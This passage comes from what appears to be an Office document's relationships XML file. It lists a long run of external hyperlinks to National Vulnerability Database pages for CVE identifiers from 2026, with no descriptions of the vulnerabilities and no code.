Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId626" /><Relationship 